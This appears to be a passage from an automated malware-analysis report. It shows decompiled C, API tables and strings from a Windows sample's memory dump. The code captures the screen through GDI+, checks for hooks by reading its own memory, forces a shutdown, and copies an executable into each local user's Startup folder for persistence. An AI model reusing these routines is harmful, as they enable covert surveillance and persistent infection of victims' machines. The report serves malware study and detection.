				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E00411991(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E004119C1(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E004119FD( &_v148, 0x4049fc, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E004119FD( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x0041a1c2
0x0041a1c5
0x0041a1c8
0x0041a1cb
0x0041a1d2
0x0041a1d5
0x0041a1d8
0x0041a1db
0x0041a1e9
0x0041a1f6
0x0041a203
0x0041a210
0x0041a21d
0x0041a22a
0x0041a237
0x0041a23a
0x0041a23c
0x0041a242
0x0041a626
0x0041a62f
0x0041a634
0x0041a634
0x0041a639
0x0041a63e
0x0041a63e
0x0041a643
0x0041a648
0x0041a648
0x0041a651
0x0041a27d
0x0041a282
0x0041a28a
0x0041a28d
0x0041a28f
0x0041a294
0x00000000
0x00000000
0x0041a29f
0x0041a2a7
0x0041a2b4
0x0041a2c0
0x0041a2cd
0x0041a2da
0x0041a2e7
0x0041a2f4
0x0041a301
0x0041a304
0x0041a306
0x0041a30b
0x00000000
0x0041a34f
0x0041a34f
0x0041a353
0x0041a357
0x0041a358
0x0041a35f
0x0041a362
0x0041a365
0x0041a36d
0x00000000
0x00000000
0x0041a37d
0x0041a37f
0x0041a384
0x0041a620
0x0041a623
0x00000000
0x0041a623
0x0041a38b
0x0041a38e
0x0041a393
0x0041a61a
0x0041a61d
0x00000000
0x0041a61d
0x0041a3a8
0x0041a3ae
0x0041a3b3
0x0041a3dd
0x0041a3dd
0x00000000
0x0041a3b5
0x0041a3c5
0x0041a3d5
0x0041a3d5
0x0041a3db
0x0041a3e1
0x0041a3e4
0x0041a3e7
0x0041a3f4
0x0041a3fc
0x0041a401
0x0041a3e9
0x0041a3e9
0x0041a3ec
0x0041a3ec
0x0041a40b
0x0041a40e
0x0041a413
0x0041a614
0x0041a617
0x00000000
0x0041a419
0x0041a41d
0x0041a420
0x0041a425
0x0041a60e
0x0041a611
0x00000000
0x0041a611
0x0041a42b
0x0041a42d
0x0041a432
0x0041a43d
0x0041a441
0x0041a446
0x0041a449
0x0041a449
0x0041a44c
0x0041a44e
0x0041a44e
0x0041a451
0x0041a451
0x0041a454
0x0041a456
0x0041a456
0x0041a454
0x0041a459
0x0041a45e
0x0041a45f
0x0041a460
0x0041a463
0x0041a466
0x0041a467
0x0041a468
0x0041a469
0x0041a471
0x0041a605
0x0041a60b
0x00000000
0x0041a477
0x0041a47a
0x0041a48b
0x0041a48e
0x0041a494
0x0041a49c
0x0041a49c
0x0041a4a5
0x0041a4a6
0x0041a4a7
0x0041a4aa
0x0041a4b2
0x00000000
0x0041a4c1
0x0041a4c4
0x0041a4c8
0x0041a4c9
0x0041a4cc
0x0041a4d4
0x0041a5ff
0x0041a602
0x00000000
0x0041a602
0x0041a4da
0x0041a4df
0x00000000
0x0041a4ee
0x0041a4f3
0x0041a4f5
0x0041a4fa
0x00000000
0x00000000
0x0041a500
0x0041a501
0x0041a504
0x0041a50c
0x0041a54a
0x0041a54d
0x0041a555
0x0041a55e
0x0041a562
0x0041a563
0x0041a569
0x0041a578
0x0041a581
0x0041a591
0x0041a59f
0x0041a5b0
0x0041a5c0
0x0041a5c4
0x0041a5c4
0x0041a5de
0x0041a5e3
0x0041a5e6
0x0041a5fc
0x0041a5e8
0x0041a5eb
0x0041a5ee
0x0041a5ee
0x0041a5e6
0x0041a569
0x00000000
0x0041a555
0x0041a50e
0x0041a513
0x00000000
0x00000000
0x0041a515
0x0041a518
0x0041a527
0x0041a528
0x0041a52e
0x00000000
0x00000000
0x00000000
0x0041a530
0x0041a542
0x0041a547
0x00000000
0x0041a547
0x0041a4df
0x0041a4b2
0x0041a471
0x0041a413
0x00000000
0x0041a3db
0x0041a3b3
0x0041a30b

APIs

LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A1DB
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A1EC
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A1F9
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A206
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A213
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A220
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A22D
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A23A
LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A282
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A28D
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A29F
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A2AA
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A2B6
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A2C3
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A2D0
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A2DD
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A2EA
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A2F7
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0041A304
LoadImageW.USER32 ref: 0041A3A8
GetIconInfo.USER32(00000000,?), ref: 0041A3BD
GetCursorPos.USER32(?), ref: 0041A3CB
DrawIcon.USER32 ref: 0041A49C
lstrcmpiW.KERNEL32(?,-00000030), ref: 0041A51D
FreeLibrary.KERNEL32(00000000), ref: 0041A634
FreeLibrary.KERNEL32(?), ref: 0041A63E
FreeLibrary.KERNEL32(00000000), ref: 0041A648

Strings

CreateStreamOnHGlobal, xrefs: 0041A284
CreateCompatibleBitmap, xrefs: 0041A2B8
GetDeviceCaps, xrefs: 0041A2C5
CreateCompatibleDC, xrefs: 0041A2AC
gdi32.dll, xrefs: 0041A29A
ole32.dll, xrefs: 0041A27D
BitBlt, xrefs: 0041A2DF
GdiplusStartup, xrefs: 0041A1E3
SelectObject, xrefs: 0041A2D2
DeleteObject, xrefs: 0041A2EC
GdipDisposeImage, xrefs: 0041A208
GdipSaveImageToStream, xrefs: 0041A22F
DISPLAY, xrefs: 0041A376
CreateDCW, xrefs: 0041A2A1
GdipGetImageEncodersSize, xrefs: 0041A215
GdiplusShutdown, xrefs: 0041A1EE
DeleteDC, xrefs: 0041A2F9
gdiplus.dll, xrefs: 0041A1BD
GdipCreateBitmapFromHBITMAP, xrefs: 0041A1FB
GdipGetImageEncoders, xrefs: 0041A222

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: d7050f9bf1043ccdf2d03a9b81d32f155d50e404b165458badccfc6989ad026c
Instruction ID: 25454cda541120ec7fb62d097dfd22ae5ffbc37c87e01f61947688c9320e08cd
Opcode Fuzzy Hash: d7050f9bf1043ccdf2d03a9b81d32f155d50e404b165458badccfc6989ad026c
Instruction Fuzzy Hash: 21E1E2B1D01259ABCF209FE5CD88AEEBBB9FF48304F14442BE615B2250D7789990CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406B42, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00406B42(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v536;
				void* _v540;
				char _v544;
				char _v644;
				signed char _v648;
				char _v748;
				short _v760;
				char _v764;
				short _v772;
				int _v776;
				int _v780;
				void _v781;
				void* _v784;
				char _v785;
				void _v788;
				void _v789;
				void* _v792;
				char _v793;
				char _v797;
				void* _v800;
				void* _v804;
				void* _v808;
				char _v809;
				int _v813;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t74;
				int _t79;
				intOrPtr* _t80;
				int _t82;
				char _t84;
				int _t87;
				void* _t91;
				int _t99;
				char _t102;
				int _t106;
				void* _t111;
				int _t128;
				void* _t143;
				void* _t145;

				_t134 = __ecx;
				_t147 =  &_v764;
				_v781 = 0;
				if(E00416BD6(0, __ecx,  &_v764,  *0x42258c) != 0) {
					_v780 = _v760;
					_t128 = E004067BB( &_v780, __ecx, _v764);
					_v776 = _t128;
					if(_t128 == 0) {
						_v780 = 0;
					}
					E00416C7E( &_v764);
				}
				if(_v780 != 0x1e6) {
					__eflags = _v780 - 0xc;
					if(__eflags != 0) {
						L41:
						E004119C1(_v772);
						return _v785;
					}
					_t74 = E0040634D(_t134, __eflags, 0x8889347b, 2);
					_v776 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E00413426(0, _t147,  *0x42258c);
						}
						goto L41;
					}
					E00406312(0x19367401,  &_v748, 1);
					_t79 = E004151A4( &_v760);
					_t147 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x422534; // 0x0
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							_v789 = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t147,  &_v789, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)(_v780 + 4)));
								_t84 = E00417DD6(_t134, E0041C612,  *((intOrPtr*)(_v780 + 8)));
								_t147 = 0x422590;
								E0041C612();
								_v797 = _t84;
								L30:
								__eflags = _v793 - 1;
								if(_v793 == 1) {
									_t87 = E00413288( &_v536, 0, _t147, 0,  &_v776);
									__eflags = _t87;
									_v813 = _t87 != 0;
									__eflags = _v813;
									if(_v813 != 0) {
										E00406312(0x1a43533f,  &_v760, 1);
										_t91 = CreateEventW(0x422568, 1, 0,  &_v772);
										_t143 = _v788;
										_v804 = _t91;
										_v800 = _t143;
										_push(0xffffffff);
										__eflags = _t91;
										if(_t91 != 0) {
											WaitForMultipleObjects(2,  &_v792, 0, ??);
										} else {
											WaitForSingleObject(_t143, ??);
										}
										_t147 = CloseHandle;
										__eflags = _v792;
										if(_v792 != 0) {
											CloseHandle(_v792);
										}
										CloseHandle(_v772);
										CloseHandle(_t143);
									}
								}
								L38:
								E00415194(_v780);
								goto L39;
							}
							__eflags = _v789 - 0xe9;
							if(_v789 != 0xe9) {
								goto L29;
							}
							_t99 = GetFileAttributesExW(0x42299e, 0x78f16360,  &_v788);
							__eflags = _t99 - 1;
							if(_t99 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)(_v784 + 4)));
							E00417DD6(_t134, L0041C97E,  *_v784);
							_push(_a4);
							_t102 =  &_v544;
							_t147 = 0x422590;
							_push(_t102);
							L0041C97E();
							_v809 = _t102;
							VirtualFree(_v808, 0, 0x8000);
							goto L30;
						}
						_v789 = E0041CCDE(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						_v781 = 0;
						_t106 = ReadProcessMemory(0xffffffff, _t147,  &_v781, 1, 0);
						__eflags = _t106;
						if(_t106 == 0) {
							goto L22;
						}
						__eflags = _v781 - 0xe9;
						if(_v781 == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E0041C8C7(_t134, _v772) != 0) {
					E00406312(0x32901130,  &_v748, 1);
					_t111 = CreateMutexW(0x422568, 1,  &_v760);
					_v792 = _t111;
					if(_t111 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle(_v780);
							_v780 = 0;
						}
						if(_v780 != 0) {
							E00419C2A(_t134,  &_v644);
							if((_v648 & 0x00000020) != 0) {
								 *0x422530 =  *0x422530 | 0x00000010;
							}
							E0041A01E();
							if(( *0x422530 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E00406312(0x1a43533f,  &_v748, 1);
							_t145 = OpenEventW(2, 0,  &_v760);
							if(_t145 != 0) {
								SetEvent(_t145);
								CloseHandle(_t145);
							}
							E00406878(1);
							_v785 = 1;
							CloseHandle(_v784);
						}
					}
				}
				goto L41;
			}

0x00406b42
0x00406b5b
0x00406b5f
0x00406b6a
0x00406b74
0x00406b7c
0x00406b81
0x00406b87
0x00406b89
0x00406b89
0x00406b91
0x00406b91
0x00406b9e
0x00406c8a
0x00406c8f
0x00406e73
0x00406e77
0x00406e86
0x00406e86
0x00406c9c
0x00406ca1
0x00406ca5
0x00406ca7
0x00406e62
0x00406e62
0x00406e66
0x00406e6e
0x00406e6e
0x00000000
0x00406e66
0x00406cb9
0x00406cc3
0x00406cc8
0x00406cd4
0x00406cd6
0x00406d01
0x00406d01
0x00406d0a
0x00406d10
0x00406d13
0x00406d2e
0x00406d32
0x00406d34
0x00406d36
0x00406d99
0x00406d9d
0x00406da8
0x00406dad
0x00406dbb
0x00406dc0
0x00406dc4
0x00406dc4
0x00406dc9
0x00406ddf
0x00406de4
0x00406de6
0x00406deb
0x00406def
0x00406dfd
0x00406e0f
0x00406e15
0x00406e19
0x00406e1d
0x00406e21
0x00406e23
0x00406e25
0x00406e38
0x00406e27
0x00406e28
0x00406e28
0x00406e3e
0x00406e44
0x00406e48
0x00406e4e
0x00406e4e
0x00406e54
0x00406e57
0x00406e57
0x00406def
0x00406e59
0x00406e5d
0x00000000
0x00406e5d
0x00406d38
0x00406d3d
0x00000000
0x00000000
0x00406d4e
0x00406d50
0x00406d53
0x00000000
0x00000000
0x00406d59
0x00406d63
0x00406d68
0x00406d6f
0x00406d76
0x00406d7b
0x00406d7e
0x00406d8d
0x00406d91
0x00000000
0x00406d91
0x00406d1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cd8
0x00406cd8
0x00406ce3
0x00406ce7
0x00406ce9
0x00406ceb
0x00000000
0x00000000
0x00406ced
0x00406cf2
0x00000000
0x00000000
0x00406cf4
0x00406cf9
0x00406cf9
0x00406cd8
0x00406baf
0x00406bc1
0x00406bd2
0x00406bd8
0x00406bde
0x00406bf5
0x00406bfb
0x00406bfd
0x00406bfd
0x00406c05
0x00406c13
0x00406c20
0x00406c22
0x00406c22
0x00406c29
0x00406c35
0x00406c3e
0x00406c3e
0x00406c50
0x00406c63
0x00406c67
0x00406c6a
0x00406c71
0x00406c71
0x00406c75
0x00406c7e
0x00406c83
0x00406c83
0x00406c05
0x00406bde
0x00000000

APIs

Part of subcall function 00416BD6: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406B68,?,?,00000000), ref: 00416BFB
Part of subcall function 00416BD6: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406B68,?,?,00000000), ref: 00416C0E

CreateMutexW.KERNEL32(00422568,00000001,?,32901130,?,00000001,?), ref: 00406BD2
GetLastError.KERNEL32 ref: 00406BE4
CloseHandle.KERNEL32(000001E6), ref: 00406BFB
ExitWindowsEx.USER32 ref: 00406C3E
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00406C5D
SetEvent.KERNEL32(00000000), ref: 00406C6A
CloseHandle.KERNEL32(00000000), ref: 00406C71
CloseHandle.KERNEL32(000001E6,00000001), ref: 00406C83
ReadProcessMemory.KERNEL32(000000FF,7519F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00406CE7
Sleep.KERNEL32(000001F4), ref: 00406CF9
IsWellKnownSid.ADVAPI32(00000000,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00406D0A
ReadProcessMemory.KERNEL32(000000FF,7519F9B0,00000000,00000001,00000000), ref: 00406D32
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00406D91
GetFileAttributesExW.KERNEL32(0042299E,78F16360,0000000C), ref: 00406D4E

Part of subcall function 00417DD6: VirtualProtect.KERNEL32(0041C612,?,00000040,00000000,7519F9B0,?,?,00406DAD,?,?), ref: 00417DEB
Part of subcall function 00417DD6: VirtualProtect.KERNEL32(0041C612,?,00000000,00000000,?,?,00406DAD,?,?), ref: 00417E1E

CreateEventW.KERNEL32(00422568,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,00422590,00000000,?,?,?), ref: 00406E0F
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00406E28
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00406E38
CloseHandle.KERNEL32(0000000C), ref: 00406E4E
CloseHandle.KERNEL32(?), ref: 00406E54
CloseHandle.KERNEL32(?), ref: 00406E57

Strings

, xrefs: 00406C18

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 561470431-3916222277
Opcode ID: 3f00d516f023f75e0ac1153187722603ef45193f599eafe630d3e24c3b4c6e40
Instruction ID: 91be39eb656dfda769d5d082a6965e7370629da91ce05b78167d963005cb1dc4
Opcode Fuzzy Hash: 3f00d516f023f75e0ac1153187722603ef45193f599eafe630d3e24c3b4c6e40
Instruction Fuzzy Hash: 6791DF71508345AFD711EF60CD84EAF7BE8AF84304F41493EF585A22A1C778C998DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCDE, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041CCDE(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E00419DD3(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E00419D9D(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00412510(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E00411D62(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E0041D902( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E00417246( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E00416FC8( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E00415E71(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E0041C3DD( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E0041C50A( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E00415E71(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E0041C3DD(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x0041ccec
0x0041ccf4
0x0041ccf7
0x0041cd05
0x0041cd09
0x0041cda6
0x00000000
0x0041cd0f
0x0041cd0f
0x0041cd17
0x0041cd20
0x0041cd28
0x0041cd2d
0x0041cd2e
0x0041cd34
0x0041cd35
0x0041cd41
0x0041cd43
0x0041cd51
0x0041cd59
0x0041cd5b
0x0041cd61
0x0041cd67
0x0041cd7c
0x0041cd81
0x0041cd91
0x0041cd96
0x0041cd96
0x0041cd7c
0x0041cd59
0x0041cd41
0x0041cd9b
0x0041cda4
0x0041cdad
0x0041cdb0
0x0041cdb3
0x0041cdb8
0x0041cdce
0x0041cdd1
0x0041cdd7
0x0041cdda
0x0041cddc
0x0041cde9
0x0041cde9
0x0041cdec
0x00000000
0x00000000
0x0041cdf2
0x0041cdf4
0x0041cdf7
0x0041ceb3
0x0041ceb6
0x00000000
0x00000000
0x00000000
0x00000000
0x0041cdfd
0x0041cdfd
0x0041ce0a
0x0041ce10
0x0041ce12
0x0041ce18
0x0041ce1b
0x0041ce1d
0x0041ce23
0x0041ce2d
0x0041ce32
0x0041ce34
0x0041ce44
0x0041ce49
0x0041ce4b
0x0041ce54
0x0041ce59
0x0041ce5b
0x0041ce74
0x0041ce76
0x0041ce86
0x0041ce88
0x0041ce97
0x0041ce9b
0x0041ce9b
0x0041ce88
0x0041ce76
0x0041ce5b
0x0041ce4b
0x0041cea3
0x0041cea3
0x0041ce1d
0x0041cea9
0x0041ceaa
0x0041ceaa
0x00000000
0x0041cdfd
0x0041cdde
0x0041cde3
0x00000000
0x00000000
0x00000000
0x0041cebc
0x0041cebc
0x0041cebc
0x0041cec9
0x0041ceda
0x0041cee0
0x0041cee2
0x0041cefb
0x0041cefd
0x0041cf08
0x0041cf0d
0x0041cf0f
0x0041cf11
0x0041cf11
0x0041cf0f
0x0041cefd
0x00000000
0x0041cf15
0x00000000
0x0041cda4

APIs

LoadLibraryW.KERNEL32(?,75145B60,7519F9B0,00000000), ref: 0041CCFF
